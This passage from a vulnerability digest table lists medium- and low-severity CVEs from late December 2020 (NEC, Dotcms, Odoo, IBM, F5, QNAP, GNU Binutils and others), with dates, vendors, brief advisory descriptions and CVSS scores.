2020-12-24 | CVE-2020-5684 | NEC | Improper Certificate Validation vulnerability in NEC ISM Server 5.1 iSM client versions from V5.1 prior to V12.1 running on NEC Storage Manager or NEC Storage Manager Express does not verify a server certificate properly, which allows a man-in-the-middle attacker to eavesdrop on an encrypted communication or alter the communication via a crafted certificate. | 4.8 |
2020-12-23 | CVE-2020-28071 | Alumni Management System Project | Cross-site Scripting vulnerability in Alumni Management System Project Alumni Management System 1.0 SourceCodester Alumni Management System 1.0 is affected by cross-site Scripting (XSS) in /admin/gallery.php. | 4.8 |
2020-12-21 | CVE-2020-35274 | Dotcms | Cross-site Scripting vulnerability in Dotcms 20.11 dotCMS 20.11 is affected by cross-site scripting (XSS) in the admin panel's Add Template function, which can be used to gain remote privileges. | 4.8 |
2020-12-24 | CVE-2020-9202 | Huawei | Insecure Storage of Sensitive Information vulnerability in Huawei TE Mobile V600R006C10/V600R006C10Spc100 There is an information disclosure vulnerability in TE Mobile software versions V600R006C10,V600R006C10SPC100. | 4.4 |
2020-12-24 | CVE-2020-27725 | F5 | Memory Leak vulnerability in F5 products In version 15.1.0-15.1.0.5, 14.1.0-14.1.3, 13.1.0-13.1.3.4, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2 of BIG-IP DNS, GTM, and Link Controller, zxfrd leaks memory when listing DNS zones. | 4.3 |
2020-12-22 | CVE-2019-11786 | Odoo | Unspecified vulnerability in Odoo Improper access control in Odoo Community 13.0 and earlier and Odoo Enterprise 13.0 and earlier, allows remote authenticated users to modify translated terms, which may lead to arbitrary content modification on translatable elements. | 4.3 |
2020-12-22 | CVE-2019-11785 | Odoo | Missing Authorization vulnerability in Odoo Improper access control in the mail module (followers) in Odoo Community 13.0 and earlier and Odoo Enterprise 13.0 and earlier allows remote authenticated users to read messages posted on business records they were not given access to, and to subscribe to receive future messages on those records. | 4.3 |
2020-12-21 | CVE-2020-4843 | IBM | Cleartext Storage of Sensitive Information vulnerability in IBM Security Secret Server 10.6 IBM Security Secret Server 10.6 stores potentially sensitive information in config files that could be read by an authenticated user. | 4.3 |
2020-12-21 | CVE-2020-29447 | Atlassian | Unrestricted Upload of File with Dangerous Type vulnerability in Atlassian Crucible Affected versions of Atlassian Crucible allow remote attackers to impact the application's availability via a Denial of Service (DoS) vulnerability in the file upload request feature of code reviews. | 4.3 |
2 Low Vulnerabilities
DATE | CVE | VENDOR | VULNERABILITY | CVSS |
---|---|---|---|---|
2020-12-27 | CVE-2020-35448 | GNU Netapp | Out-of-bounds Read vulnerability in multiple products An issue was discovered in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils 2.35.1. | 3.3 |
2020-12-24 | CVE-2020-2505 | Qnap | Information Exposure Through an Error Message vulnerability in Qnap QES If exploited, this vulnerability could allow attackers to obtain sensitive information from generated error messages. | 2.3 |